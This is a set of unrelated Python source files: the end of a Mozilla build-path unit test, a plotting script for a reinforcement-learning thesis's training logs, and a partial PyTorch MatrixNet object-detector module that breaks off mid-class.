        self.assertEqual(env.get_input('relative/file'), os.path.join('..', 'file.in'))
        self.assertEqual(env.get_input('relative/dir/file'), os.path.join('..', 'dir', 'file.in'))
        self.assertEqual(env.get_top_srcdir('relative/file'), '../..')
        self.assertEqual(env.get_top_srcdir('relative/dir/file'), '../../..')
        self.assertEqual(env.get_file_srcdir('relative/file'), '../..')
        self.assertEqual(env.get_file_srcdir('relative/dir/file'), '../../../dir')
    def test_paths_relative_build_absolute_src(self):
        # topsrcdir = /absolute ; topobjdir = relative
        env = self.get_env(self.absolute)
        self.assertEqual(env.get_input('relative/file'), os.path.join(self.absolute, 'file.in'))
        self.assertEqual(env.get_input('relative/dir/file'), os.path.join(self.absolute, 'dir', 'file.in'))
        self.assertEqual(env.get_top_srcdir('relative/file'), '/absolute')
        self.assertEqual(env.get_top_srcdir('relative/dir/file'), '/absolute')
        self.assertEqual(env.get_file_srcdir('relative/file'), '/absolute')
        self.assertEqual(env.get_file_srcdir('relative/dir/file'), '/absolute/dir')
class TestPathsAbsoluteBuild(unittest.TestCase):
    """Path helpers when the build dir is an absolute path ('/absolute/build')."""
    def setUp(self):
        self.absolute_build = os.path.normpath('/absolute/build')
    def get_env(self, topsrcdir):
        """Build an env with an absolute topobjdir and check srcdir/depth
        helpers (these do not depend on where topsrcdir is)."""
        env = ConfigEnvironment(topsrcdir = topsrcdir, topobjdir = self.absolute_build)
        self.assertEqual(env.get_relative_srcdir('/absolute/build/file'), '.')
        self.assertEqual(env.get_relative_srcdir('/absolute/build/dir/file'), 'dir')
        self.assertEqual(env.get_relative_srcdir('/absolute/build/deeply/nested/path/to/file'), 'deeply/nested/path/to')
        self.assertEqual(env.get_depth('/absolute/build/file'), '.')
        self.assertEqual(env.get_depth('/absolute/build/dir/file'), '..')
        self.assertEqual(env.get_depth('/absolute/build/deeply/nested/path/to/file'), '../../../..')
        return env
    def test_paths_absolute_build_same_src(self):
        # topsrcdir = /absolute/build ; topobjdir = /absolute/build
        env = self.get_env(self.absolute_build)
        self.assertEqual(env.get_input('/absolute/build/file'), os.path.join(self.absolute_build, 'file.in'))
        self.assertEqual(env.get_input('/absolute/build/dir/file'), os.path.join(self.absolute_build, 'dir', 'file.in'))
        self.assertEqual(env.get_top_srcdir('/absolute/build/file'), '/absolute/build')
        self.assertEqual(env.get_top_srcdir('/absolute/build/dir/file'), '/absolute/build')
        self.assertEqual(env.get_file_srcdir('/absolute/build/file'), '/absolute/build')
        self.assertEqual(env.get_file_srcdir('/absolute/build/dir/file'), '/absolute/build/dir')
    def test_paths_absolute_build_ancestor_src(self):
        # topsrcdir = /absolute ; topobjdir = /absolute/build
        absolute = os.path.dirname(self.absolute_build)
        env = self.get_env(absolute)
        self.assertEqual(env.get_input('/absolute/build/file'), os.path.join(absolute, 'file.in'))
        self.assertEqual(env.get_input('/absolute/build/dir/file'), os.path.join(absolute, 'dir', 'file.in'))
        self.assertEqual(env.get_top_srcdir('/absolute/build/file'), '/absolute')
        self.assertEqual(env.get_top_srcdir('/absolute/build/dir/file'), '/absolute')
        self.assertEqual(env.get_file_srcdir('/absolute/build/file'), '/absolute')
        self.assertEqual(env.get_file_srcdir('/absolute/build/dir/file'), '/absolute/dir')
    def test_paths_absolute_build_different_src(self):
        # topsrcdir = /some/path ; topobjdir = /absolute/build
        absolute = os.path.normpath('/some/path')
        env = self.get_env(absolute)
        self.assertEqual(env.get_input('/absolute/build/file'), os.path.join(absolute, 'file.in'))
        self.assertEqual(env.get_input('/absolute/build/dir/file'), os.path.join(absolute, 'dir', 'file.in'))
        self.assertEqual(env.get_top_srcdir('/absolute/build/file'), '/some/path')
        self.assertEqual(env.get_top_srcdir('/absolute/build/dir/file'), '/some/path')
        self.assertEqual(env.get_file_srcdir('/absolute/build/file'), '/some/path')
        self.assertEqual(env.get_file_srcdir('/absolute/build/dir/file'), '/some/path/dir')
# Allow running this test file directly via mozunit's test runner.
if __name__ == "__main__":
    main()
|
import os
import re
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import style
from util import stats, game_info as gi
from configparser import ConfigParser
from scipy.interpolate import spline
# Project root derived from this file's own path.
# NOTE(review): the replace() assumes forward slashes and this exact relative
# location — confirm it behaves on Windows-style __file__ values.
PROJECT_ROOT = str(__file__).replace("util/graphs/offline_graphs.py", "")
TEMP_DIR = PROJECT_ROOT + "util/temp/"
LOG_DIR = PROJECT_ROOT + "util/logs/"
NET_DIR = PROJECT_ROOT + "Networks/saved/"
# Machine-specific absolute output directory for generated diagrams.
SAVE_DIR = "E:/Studium/6. Semester/Bachelorarbeit/Diagrams/"
VERBOSE = False
# Per-action counts (36 entries); presumably collected from training logs —
# confirm the source.
action_counts_all_tob = [1649783, 309527, 147870, 141391, 320286, 178412, 274622, 165084,
                         239448, 251223, 188318, 290155, 213037, 232899, 169770, 199118,
                         314126, 207407, 147208, 193214, 130571, 165308, 296463, 177198,
                         177655, 237462, 240246, 213827, 169740, 202578, 149248, 117873,
                         198860, 311093, 236327, 197635]
def height():
    """Plot the height reward curve (0..2000 normalised to 0..1) raised to
    the powers 1 through 4, to compare reward shaping variants."""
    xs = [i * 20 for i in range(101)]
    base = [v / 2000.0 for v in xs]
    plt.plot(xs, base,
             xs, [b ** 2 for b in base],
             xs, [b ** 3 for b in base],
             xs, [b ** 4 for b in base])
    plt.show()
def angle_to():
    """Plot the angle reward (1 at 0 deg, clamped to 0 beyond +/-90 deg)
    raised to the powers 1-4, preserving sign for even powers."""
    xs = [i - 180 for i in range(361)]
    y1 = [max(0.0, ((180 - abs(v)) / 180.0 - 0.5) * 2) for v in xs]
    # Even powers lose the sign, so it is restored explicitly.
    y2 = [v ** 2 if v >= 0 else -(v ** 2) for v in y1]
    y3 = [v ** 3 for v in y1]
    y4 = [v ** 4 if v >= 0 else -(v ** 4) for v in y1]
    plt.plot(xs, y1, xs, y2, xs, y3, xs, y4)
    plt.show()
def bool_height():
    """Plot a boolean (step) height reward: 0 for the lower half of the
    height range, 1 for the upper half."""
    xs = [i * 20 for i in range(101)]
    half = 101 // 2
    ys = [0] * half + [1] * (101 - half)
    plt.plot(xs, ys)
    plt.show()
def bool_angle():
    """Plot a boolean angle reward: 1 within +/-60 entries of the centre
    (0 degrees), 0 elsewhere."""
    xs = [i - 180 for i in range(361)]
    mid = 361 // 2
    ys = [1 if mid - 60 <= i < mid + 60 else 0 for i in range(361)]
    plt.plot(xs, ys)
    plt.show()
def discrete_height(step_size=20):
    """Plot the height reward discretised into *step_size*-wide buckets,
    raised to the powers 1-4."""
    xs = [i * 20 for i in range(101)]
    base = [(20 * step_size * (i // step_size)) / 2000.0 for i in range(101)]
    plt.plot(xs, base,
             xs, [v ** 2 for v in base],
             xs, [v ** 3 for v in base],
             xs, [v ** 4 for v in base])
    plt.show()
def discrete_angle(step_size=20, no_neg=False):
    """Plot the angle reward in *step_size*-degree buckets, with powers 1-4.

    :param step_size: width (in entries/degrees) of each constant bucket
    :param no_neg: clamp negative rewards to 0 before bucketing
    """
    x = [i - 180 for i in range(361)]
    # Linear reward: 1 at 0 degrees, falling to -1 at +/-180 degrees.
    y1 = [(((180 - abs(x[i])) / 180.0) - 0.5) * 2 for i in range(361)]
    if no_neg:
        y1 = [max(0.0, y1[i]) for i in range(361)]
    # Flatten each bucket to the value at its left edge.
    n_sections = int(len(x) / step_size) + 1
    for a in range(n_sections - 1):
        y1[a * step_size: (a + 1) * step_size] = [y1[a * step_size] for _ in range(step_size)]
    # Shift x by half a step so each plateau is centred on its bucket.
    x = [x[i] - step_size / 2 for i in range(361)]
    # Squared reward, sign-preserving.
    y2 = []
    for i in range(361):
        if y1[i] < 0:
            y2.append(-(y1[i] ** 2))
        else:
            y2.append(y1[i] ** 2)
    # Cubed reward (odd powers preserve sign on their own).
    y3 = []
    for i in range(361):
        y3.append(y1[i] ** 3)
    # Fourth-power reward, sign-preserving.
    y4 = []
    for i in range(361):
        if y1[i] < 0:
            y4.append(-(y1[i] ** 4))
        else:
            y4.append(y1[i] ** 4)
    plt.plot(x, y1, x, y2, x, y3, x, y4)
    plt.show()
def reward_graph(net_name):
    """Plot the six reward components of a bot in a 2x3 subplot grid and
    print each component's mean.

    :param net_name: bot/network name; its log directory must contain
        reward_info.csv
    """
    print(net_name)
    data = np.loadtxt(LOG_DIR + net_name + "/reward_info.csv", delimiter=",").transpose().tolist()
    steps = list(range(len(data[0])))
    titles = ["re_height", "re_airtime", "re_ball_dist", "re_facing_up", "re_facing_opp", "re_facing_ball"]
    fig = plt.figure()
    for idx, title in enumerate(titles):
        ax = fig.add_subplot(2, 3, idx + 1)
        ax.set_title(title, fontdict={"fontsize": 12})
        ax.plot(steps, data[idx])
        print(title + ": " + str(round(sum(data[idx]) / len(data[idx]), 3)))
    if VERBOSE:
        plt.show()
    print()
def show_all(src_dir, save_dir):
    """Render every diagram described in the module-level ``infos`` table.

    :param src_dir: directory holding one bot's CSV log files
    :param save_dir: directory the plot images are written to
    NOTE(review): relies on ``infos`` being defined (it is set in the
    __main__ block) — confirm before calling from another module.
    """
    for info in infos:
        if isinstance(info["file"], list):
            # Multiple source files: stack them into one array.
            vals = []
            for file in info["file"]:
                vals.append(np.loadtxt(src_dir + file, delimiter=","))
            vals = np.array(vals)
        else:
            vals = np.loadtxt(src_dir + info["file"], delimiter=",")
        if vals.shape == () or vals.shape[0] <= 1:
            # Scalar or single-row logs cannot be plotted meaningfully.
            print("bad values:", src_dir.split("/")[-2], info["file"])
            continue
        info["plot_func"](info["title"], vals, save_dir)
def est_errs_full_plot(title, vals, save_dir):
    """Histogram of all estimation errors, bucketed into up to 50 bins.

    Bin edges are spaced by max(vals)/50 and deduplicated after integer
    truncation.
    NOTE(review): values above the last edge (int(49*s)) are silently
    dropped by plt.hist — confirm whether the top bin should reach max(vals).
    """
    s = max(vals) / 50
    bins = [0]
    for i in range(50):
        next_bin = int(i * s)
        if next_bin > bins[-1]:
            bins.append(next_bin)
    plt.title(title, fontdict={"fontsize": 12})
    plt.hist(vals, bins, histtype="bar")
    if VERBOSE:
        plt.show()
    # Fix: write the ".png" extension explicitly, consistent with
    # est_errs_low_plot (previously relied on matplotlib's default-format
    # fallback appending it).
    plt.savefig(save_dir + "est errs full.png")
    plt.clf()
def est_errs_low_plot(title, vals, save_dir):
    """Histogram of estimation errors restricted to the 0-24 range."""
    edges = list(range(25))
    plt.title(title, fontdict={"fontsize": 12})
    plt.hist(vals, edges, histtype="bar")
    if VERBOSE:
        plt.show()
    plt.savefig(save_dir + "est errs low.png")
    plt.clf()
def state_diff_plot(title, vals, save_dir):
    """Plot each state-differential component, averaged into 100 points,
    saving one image ("sd<i>.png") per component."""
    n_displayed = 100
    # One sub-array per state component (column).
    vals = np.split(vals, len(vals[0]), axis=1)
    for i in range(len(vals)):
        y = stats.average_into(vals[i], n_displayed)
        x = np.linspace(0, len(y), len(y))
        plt.title(title, fontdict={"fontsize": 12})
        plt.plot(x, y)
        if VERBOSE:
            plt.show()
        plt.savefig(save_dir + "sd" + str(i) + ".png")
        plt.clf()
def q_vals_plot(title, vals, save_dir):
    """Plot real vs. predicted Q-values per action, averaged into 100
    points, saving one image ("qv<i>.png") per action.

    :param vals: pair-like array: vals[0] real Q-values, vals[1] predictions
    """
    n_displayed = 100
    real_q_vals = vals[0]
    pred_q_vals = vals[1]
    try:
        n_qs = len(real_q_vals[0])
    except TypeError:
        # A scalar first entry means there is no per-action axis to split.
        print("too few q_value entries")
        return
    # One sub-array per action (column).
    real_q_vals = np.array_split(real_q_vals, n_qs, axis=1)
    pred_q_vals = np.array_split(pred_q_vals, n_qs, axis=1)
    for i in range(n_qs):
        y_r = stats.average_into(real_q_vals[i], n_displayed)
        y_p = stats.average_into(pred_q_vals[i], n_displayed)
        x = [i for i in range(len(y_r))]
        plt.title(title, fontdict={"fontsize": 12})
        plt.plot(x, y_r, x, y_p)
        if VERBOSE:
            plt.show()
        plt.savefig(save_dir + "qv" + str(i) + ".png")
        plt.clf()
def simple_averaged_plot(title, vals, save_dir):
    """Plot *vals* averaged down to at most 100 points and save the figure
    as "<title>.png" in *save_dir*."""
    n_points = min(len(vals), 100)
    xs = [idx * (len(vals) / n_points) for idx in range(n_points)]
    plt.title(title, fontdict={"fontsize": 12})
    plt.plot(xs, stats.average_into(vals, n_points))
    if VERBOSE:
        plt.show()
    plt.savefig(save_dir + title + ".png")
    plt.clf()
def net_output_plot(title, vals, save_dir):
    """Save bar charts of mean network output over all iterations, the last
    100, and the last 10, plus a histogram of the final iteration."""
    net_plot_helper(title, vals)
    plt.savefig(save_dir + "actions full.png")
    plt.clf()
    start = min(len(vals) - 1, 100)
    net_plot_helper(title, vals[-start:-1])
    plt.savefig(save_dir + "actions 100.png")
    plt.clf()
    start = min(len(vals) - 1, 10)
    net_plot_helper(title, vals[-start:-1])
    plt.savefig(save_dir + "actions 10.png")
    plt.clf()
    plt.title(title, fontdict={"fontsize": 12})
    try:
        plt.hist(vals[-1], [i for i in range(len(vals[0]))], histtype="bar")
    except ValueError:
        # Fall back to an explicit range when the bin edges are rejected.
        plt.hist(vals[-1], [i for i in range(len(vals[0]))], range=(0, len(vals[0])), histtype="bar")
    if VERBOSE:
        plt.show()
def net_plot_helper(title, vals):
    """Bar-plot the per-action mean of *vals* (rows = iterations,
    columns = actions).

    Fixes: the inner loop variable shadowed the builtin ``iter``; the
    manual accumulation is replaced by a column-wise mean via zip().
    """
    n_rows = len(vals)
    y = [sum(col) / n_rows for col in zip(*vals)]
    x = list(range(len(y)))
    plt.title(title, fontdict={"fontsize": 12})
    plt.bar(x, y)
    if VERBOSE:
        plt.show()
def reward_comparison(bots, max_reward=1e+6, norm_len=None, norm_y=False, ref=None, n_points=100, legend=False):
    """
    Creates a diagram with a line for each bot, displaying the reward they got throughout training
    :param bots: the id's of the bots for the diagram
    :param max_reward: cutoff point for rewards; any bot with a maximum reward greater than max_reward will not be
    included in the diagram
    :param norm_len: specifies the maximum value on the x-Axis, all lines will be streched to this length
    if None the x-Axis will go from 0 to the episode count of the longest running bot
    :param norm_y: whether the values are per iteration or per episode (for bots with task tob all episodes have the
    same length; by dividing the per-episode-value by the episode length a per-iteration-value is calculated)
    :param ref: the reference value for the bots (how much reward random action yields in the given circumstance)
    :param n_points: how many points are displayed of each line (high variance can clutter the diagram if n_points is too high)
    :param legend: whether the legend is displayed
    :return:

    NOTE(review): scipy.interpolate.spline was removed in SciPy 1.0+; on a
    modern SciPy this call needs porting (e.g. to make_interp_spline).
    """
    avrg_x = norm_len if norm_len is not None else 0
    averages = np.zeros([n_points])
    avrg_ep_len = 0
    for b in bots:
        description = descriptor(b, delimiter=", ")
        ep_lens = np.loadtxt(LOG_DIR + b + "/episode_lengths.csv", delimiter=",")
        # Mean episode length, used to fold rewards into per-episode sums.
        ep_len = max(1, int(sum(ep_lens)/len(ep_lens)))
        avrg_ep_len += ep_len
        rewards = np.loadtxt(LOG_DIR + b + "/reward_info.csv", delimiter=",")
        rewards = np.sum(rewards, axis=1)
        rewards = reduce_rewards(rewards, ep_len, norm=norm_y)
        # Skip diverged runs that would dwarf every other line.
        if max(rewards) > max_reward:
            continue
        print(b)
        print(description)
        m_index = np.argmax(rewards)
        print("Max: {0:.2f} at {1:d} ({2:d}|{3:.2f}%)".format(max(rewards), m_index, len(rewards), 100 * m_index / len(rewards)))
        print("Last:", rewards[-1])
        print(stats.DistributionInfo(rewards))
        print()
        x_max = len(rewards) if norm_len is None else norm_len
        if x_max > avrg_x:
            avrg_x = x_max
        # Resample every line to n_points via spline interpolation.
        x_old = np.linspace(0, x_max, len(rewards))
        x_new = np.linspace(0, x_max, n_points)
        smoothed = spline(x_old, rewards, x_new)
        plt.plot(x_new, smoothed, label=description)
        for i in range(n_points):
            averages[i] += smoothed[i]
    avrg_ep_len /= len(bots)
    avrg_x = np.linspace(0, avrg_x, n_points)
    averages = [val / len(bots) for val in averages]
    plt.plot(avrg_x, averages, label="average", color="k", linestyle="--")
    if ref is not None:
        if norm_y:
            ref_y = [ref for _ in range(n_points)]
        else:
            # Scale the per-iteration reference up to per-episode values.
            ref_y = [ref*avrg_ep_len for _ in range(n_points)]
        plt.plot(avrg_x, ref_y, label="reference", color="k")
    if legend:
        plt.legend(loc="upper center", fontsize=12, framealpha=1)
    plt.show()
    plt.clf()
def action_summation(bots, n_actions):
    """Aggregate and bar-plot how often each action was the network's
    argmax across all iterations of all *bots*.

    Fix: the inner row loop reused the name ``i`` and shadowed the bot
    index from enumerate(), so the progress print reported row counts
    instead of bot progress.
    """
    action_counts = np.zeros([n_actions])
    for i, bot_name in enumerate(bots):
        data = np.loadtxt(LOG_DIR + bot_name + "/net_output.csv", delimiter=",")
        for row in range(len(data)):
            action_counts[np.argmax(data[row])] += 1
        # NOTE(review): this prints a fraction, not a percentage, despite
        # the "%" suffix — confirm the intended progress format.
        print(str(i/len(bots)) + "%")
    print(action_counts)
    x = np.linspace(0, len(action_counts), len(action_counts))
    plt.bar(x, action_counts)
    plt.show()
    plt.clf()
def avrg_episode_length(bots):
    """Plot each bot's per-episode wall-clock times as one line per bot."""
    data = []
    for bot_name in bots:
        ep_lens = np.loadtxt(LOG_DIR + bot_name + "/episode_times.csv")
        data.append(ep_lens)
    # Length of the longest run (only used by the disabled averaging below).
    max_len = max([len(row) for row in data])
    '''
    y = np.zeros([max_len])
    n = np.zeros([max_len])
    for r in range(len(data)):
        for c in range(len(data[r])):
            y[c] += data[r][c]
            n[c] += 1
    for i in range(len(y)):
        y[i] /= n[i]
    print(y)
    print(n)
    '''
    for y in data:
        x = [i for i in range(len(y))]
        plt.plot(x, y)
    plt.show()
    plt.clf()
def rare_actions(bots, n_actions):
    """Print, per bot, how many times each action's network output was
    exactly zero.

    Improvements: dropped the unused enumerate index, and replaced the
    per-element Python double loop with a vectorized column-wise count
    (cast to float to match the old np.zeros accumulator's printed form).
    ``n_actions`` is kept for interface compatibility; the column count now
    comes directly from the data.
    """
    for bot_name in bots:
        data = np.loadtxt(LOG_DIR + bot_name + "/net_output.csv", delimiter=",")
        rares = np.sum(data == 0, axis=0).astype(float)
        print(bot_name, rares)
    print()
def reduce_rewards(rewards, ep_len, norm=False):
    """Collapse per-iteration rewards into per-episode sums.

    :param rewards: flat sequence of per-iteration reward values
    :param ep_len: number of iterations per episode (trailing partial
        episodes are dropped)
    :param norm: if True, divide each episode sum by ep_len to get a
        per-iteration average
    :return: list with one value per complete episode
    """
    n_sections = len(rewards) // ep_len
    result = []
    for section in range(n_sections):
        chunk = rewards[section * ep_len:(section + 1) * ep_len]
        total = sum(chunk)
        if norm:
            total /= ep_len
        result.append(total)
    return result
def get_bots(net_type=None, bot_type=None, task=None, sarsa=None, neg_reward=None, include_reference=False):
    """Return the names of all logged bots matching the given filters.

    Each ``None`` filter matches everything. Filters are compared against
    the colon-separated descriptor fields
    ``net:bot_type:task:sarsa:neg_reward``.
    :param include_reference: also include bots whose name contains "ref"
    """
    reader = ConfigParser()
    reader.read(LOG_DIR + "run_index.cfg")
    bots = []
    for bot_name in reader.keys():
        if not include_reference and re.search("ref", bot_name) is not None:
            continue
        try:
            d = descriptor(bot_name).split(":")
        except BadBotError as e:
            # Bots with incomplete logs are skipped, not fatal.
            print(e)
            continue
        match_nt = net_type is None or d[0] == net_type
        match_bt = bot_type is None or d[1] == bot_type
        match_t = task is None or d[2] == task
        match_s = sarsa is None or d[3] == sarsa
        match_nr = neg_reward is None or d[4] == neg_reward
        if match_nt and match_bt and match_t and match_s and match_nr:
            print(bot_name, d)
            bots.append(bot_name)
    if len(bots) == 0:
        print("no bots found")
    return bots
def fix_neg_reward():
    """Backfill the "neg_reward" flag for runs that predate it.

    For each bot in run_index.cfg without a neg_reward entry, derive the
    flag from the minimum logged reward and write the amended index to
    run_index_corrected.cfg (the original file is left untouched).
    """
    reader = ConfigParser()
    reader.read(LOG_DIR + "run_index.cfg")
    for bot_name in reader.keys():
        try:
            _ = reader[bot_name]["neg_reward"]
        except KeyError:
            try:
                rewards = np.loadtxt(LOG_DIR + bot_name + "/reward_info.csv", delimiter=",")
                min_reward = np.min(rewards)
                if min_reward < 0:
                    reader[bot_name]["neg_reward"] = "True"
                else:
                    reader[bot_name]["neg_reward"] = "False"
            except OSError:
                # No reward log for this bot; leave the flag undecided.
                print("could not decide neg reward for", bot_name)
    with open(LOG_DIR + "run_index_corrected.cfg", "w") as file:
        reader.write(file)
def descriptor(bot_name, delimiter=":"):
    """Build the bot's descriptor string
    ``net<delim>bot_type<delim>task<delim>sarsa<delim>neg_reward``.

    :param bot_name: section name in run_index.cfg
    :param delimiter: separator between the descriptor fields
    :raises BadBotError: if the bot is missing from the run index or lacks
        the config/log entries needed to derive a field
    """
    run_index = ConfigParser()
    run_index.read(LOG_DIR + "run_index.cfg")
    try:
        bot_info = run_index[bot_name]
    except KeyError:
        raise BadBotError(bot_name, "not found")
    try:
        end_conditions = bot_info["end_conditions"].split(", ")
    except KeyError:
        raise BadBotError(bot_name, "No end condition info")
    # Any end condition marks the "tob" task; none means free flying.
    if end_conditions[0] != "None":
        task = "tob"
    else:
        task = "fly"
    try:
        sarsa = "s" if bot_info["sarsa"] == "True" else "x"
    except KeyError:
        raise BadBotError(bot_name, "No sarsa info")
    try:
        neg_reward = "n" if bot_info["neg_reward"] == "True" else "x"
    except KeyError:
        # Older runs lack the flag; derive it from the logged rewards.
        try:
            rewards = np.loadtxt(LOG_DIR + bot_name + "/reward_info.csv", delimiter=",")
        except OSError:
            raise BadBotError(bot_name, "no reward info")
        min_reward = np.min(rewards)
        neg_reward = "n" if min_reward < 0 else "x"
    bot_type = bot_info["bot_type"]
    return net_descriptor(bot_name) + delimiter + bot_type + delimiter + task + delimiter + sarsa + delimiter + neg_reward
def net_descriptor(bot_name):
    """Build a short code for the bot's network: a conv/fully-connected
    marker, the layer count, and a trailing "d" when dropout is present."""
    net_cfg = ConfigParser()
    net_cfg.read(NET_DIR + bot_name + "/net.cfg")
    net_format = ""
    # A first layer of size 256 marks the convolutional variant.
    if int(net_cfg["Layer0"]["size"]) == 256:
        net_format += "c"
    else:
        net_format += "f"
    size = int(net_cfg["Format"]["n_layers"])
    # Dropout nets alternate real and dropout layers, so halve the count.
    has_do = not size == 1 and net_cfg["Layer1"]["type"] == "do"
    if has_do:
        size /= 2
    net_format += str(int(size))
    if has_do:
        net_format += "d"
    return net_format
def create_graphs(bots=None):
    """Generate and save the diagrams for every bot in *bots* (default:
    all bots from the run index), printing progress along the way.

    Deduplicated: the per-bot body previously copied create_graph's code
    verbatim; it now delegates to create_graph.
    """
    if bots is None:
        bots = get_bots()
    for i, bot in enumerate(bots):
        print("{0:d} out of {1:d} completed".format(i, len(bots)))
        print("current:", bot)
        create_graph(bot)
def create_graph(bot_name):
    """Generate and save all diagrams for a single bot, unless its output
    directory already exists."""
    desc = descriptor(bot_name, delimiter=",")
    _, _, task, _, _ = desc.split(",")
    src_dir = LOG_DIR + bot_name + "/"
    save_dir = SAVE_DIR + "task " + task + "/" + desc + " - " + bot_name + "/"
    if os.path.isdir(save_dir):
        # Existing output is treated as complete; nothing is overwritten.
        print("graphs already exist")
        return
    else:
        os.makedirs(save_dir)
    show_all(src_dir, save_dir)
class BadBotError(Exception):
    """Raised when a bot cannot be described from the run index or logs."""

    def __init__(self, bot_name, reason):
        self.bot = bot_name
        self.reason = reason

    def __str__(self):
        return "{} was not valid because: {}".format(self.bot, self.reason)
if __name__ == '__main__':
    style.use("fivethirtyeight")
    figure = plt.figure()
    rows = 3
    cols = 4
    # Table of diagrams rendered by show_all(): CSV source file(s) + plotter.
    infos = [
        {"title": "Estimation Errors Full", "file": "estimation_errors.csv", "plot_func": est_errs_full_plot},
        {"title": "Estimation Errors Low", "file": "estimation_errors.csv", "plot_func": est_errs_low_plot},
        {"title": "Averaged Estimation Errors", "file": "avrg_estimation_errors.csv", "plot_func": simple_averaged_plot},
        {"title": "Rewards", "file": "rewards.csv", "plot_func": simple_averaged_plot},
        {"title": "Iterations per Episode", "file": "episode_lengths.csv", "plot_func": simple_averaged_plot},
        {"title": "Episode length", "file": "episode_times.csv", "plot_func": simple_averaged_plot},
        {"title": "Q_Update length", "file": "mem_up_times.csv", "plot_func": simple_averaged_plot},
        {"title": "Training lenght", "file": "train_times.csv", "plot_func": simple_averaged_plot},
        {"title": "Net Output", "file": "net_output.csv", "plot_func": net_output_plot},
        {"title": "States Differentials", "file": "state_diffs.csv", "plot_func": state_diff_plot},
        {"title": "Q-Values", "file": ["q_values.csv", "pred_q_values.csv"], "plot_func": q_vals_plot}
    ]
    bots_taxx = ["FlowBot_tob1535467552", 'FlowBot1536231138', 'FlowBot1536232921', 'FlowBot1536235613', 'FlowBot1536238030', 'FlowBot1536240328', 'FlowBot1536241818', 'FlowBot1536268211']
    bot_type = "all"
    # Compare all sarsa bots with negative rewards on the "tob" task.
    bots = get_bots(net_type=None, bot_type=bot_type, task="tob", sarsa="s", neg_reward="n")
    bots.append("FlowBot1536677070_a")
    # create_graphs(["FlowBot1536677070_a"])
    # create_graph("FlowBot1536268211")
    # Reference reward for random action (currently zero).
    ref = 0.0 ** 2
    reward_comparison(bots, norm_len=100, norm_y=True, n_points=25, ref=ref, legend=True)
    # action_summation(bots, n_actions=len(gi.get_action_states(bot_type)))
    # rare_actions(bots, n_actions=len(gi.get_action_states(bot_type)))
    # avrg_episode_length(bots)
    # fix_neg_reward()
|
<reponame>rra94/maskmatrix
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from .py_utils.loss_utils import _regr_loss, _neg_loss
from torch.autograd import Variable
from .resnet_features import resnet152_features, resnet50_features, resnet18_features, resnet101_features, resnext101_32x8d, wide_resnet101_2
from .py_utils.utils import conv1x1, conv3x3
from .matrixnet import _sigmoid, MatrixNet, _gather_feat, _tranpose_and_gather_feat, _topk, _nms
class SubNet(nn.Module):
    """Small conv head: *depth* 3x3/256 layers followed by a 3x3 output
    conv whose channel count depends on *mode*.

    :param mode: 'corners' (4 ch), 'tl_corners'/'br_corners' (2 ch) or
        'classes' (1 ch).
        NOTE(review): mode 'objectness' (requested by the RPN below) has
        no branch here, leaving ``subnet_output`` unset until forward()
        fails — confirm the intended mode set.
    :param output_activation: stored but never applied in forward().
    """
    def __init__(self, mode, depth=4,
                 base_activation=F.relu,
                 output_activation=F.sigmoid):
        super(SubNet, self).__init__()
        self.depth = depth
        self.base_activation = base_activation
        self.output_activation = output_activation
        self.subnet_base = nn.ModuleList([conv3x3(256, 256, padding=1)
                                          for _ in range(depth)])
        if mode == 'corners':
            self.subnet_output = conv3x3(256, 4, padding=1)
        if mode == 'tl_corners':
            self.subnet_output = conv3x3(256, 2, padding=1)
        if mode == 'br_corners':
            self.subnet_output = conv3x3(256, 2, padding=1)
        if mode == 'classes':
            # add an extra dim for confidence
            self.subnet_output = conv3x3(256, 1, padding=1)
    def forward(self, x):
        # Shared 256-channel trunk with the configured activation,
        # then the raw (un-activated) mode-specific output map.
        for layer in self.subnet_base:
            x = self.base_activation(layer(x))
        x = self.subnet_output(x)
        return x
# Main two-stage detector module.
class MatrixNet2Stage(nn.Module):
    """Two-stage MatrixNet detector: backbone + RPN + RoI head + predictor.

    NOTE(review): this constructor cannot run as written — the
    ``rpn_*_top_n_*`` names are undefined, ``nn.Module.__init__`` is never
    called before submodules are assigned, ``MaxtrixNetAnchorsRPN`` /
    ``MatrixNetsAnchorsROI`` are misspelled/undefined, ``rpn_head`` is
    unused, and the super() call names ``MatrixNets2Stage`` and passes
    undefined arguments. Confirm the intended torchvision-style
    GeneralizedRCNN wiring before use.
    """
    def __init__(self,classes, resnet, rpn_head, roi, layers):
        self.backbone = MatrixNetAnchorsBackbone(resnet, layers)
        self.rpn = MaxtrixNetAnchorsRPN(classes, self.backbone, layers)
        self.roi = MatrixNetsAnchorsROI()
        self.predictor = MatrixNetPredictor()
        rpn_pre_nms_top_n = dict(training=rpn_pre_nms_top_n_train, testing=rpn_pre_nms_top_n_test)
        rpn_post_nms_top_n = dict(training=rpn_post_nms_top_n_train, testing=rpn_post_nms_top_n_test)
        super(MatrixNets2Stage, self).__init__(backbone, rpn, roi_heads, transform)
# Feature-extractor backbone.
class MatrixNetAnchorsBackbone(nn.Module):
    """Feature-extraction backbone: a named ResNet variant wrapped in a
    MatrixNet feature pyramid.

    Fixes: super() previously referenced the undefined name
    ``MatrixNetAnchors`` (NameError on construction); an unknown backbone
    name fell through to an UnboundLocalError and the error path called
    ``sys.exit()`` without importing ``sys`` — it now raises ValueError.

    :param resnet: one of "resnext101_32x8d", "resnet101", "resnet50",
        "resnet152"
    :param layers: layer-range configuration forwarded to MatrixNet
    """

    def __init__(self, resnet, layers):
        super(MatrixNetAnchorsBackbone, self).__init__()
        self.resnet = resnet
        if self.resnet == "resnext101_32x8d":
            _resnet = resnext101_32x8d(pretrained=True)
        elif self.resnet == "resnet101":
            _resnet = resnet101_features(pretrained=True)
        elif self.resnet == "resnet50":
            _resnet = resnet50_features(pretrained=True)
        elif self.resnet == "resnet152":
            _resnet = resnet152_features(pretrained=True)
        else:
            # Fail loudly on unsupported backbone names.
            raise ValueError("invalid resnet backbone: {!r}".format(resnet))
        self.matrix_net = MatrixNet(_resnet, layers)

    def forward(self, x):
        # Returns one feature map per pyramid level.
        return self.matrix_net(x)
# Region proposal network (RPN).
class MatrixNetAnchorsRPN(nn.Module):
    """Anchor RPN head: objectness heatmaps plus top-left and bottom-right
    corner regressions for every feature level.

    Fix: super() previously referenced the undefined name
    ``MatrixNetAnchors`` and raised NameError on construction.

    NOTE(review): SubNet has no 'objectness' branch, so
    SubNet(mode='objectness') leaves ``subnet_output`` unset and fails in
    forward() — confirm the intended mode name (likely 'classes').
    """

    def __init__(self, classes, features, layers):
        super(MatrixNetAnchorsRPN, self).__init__()
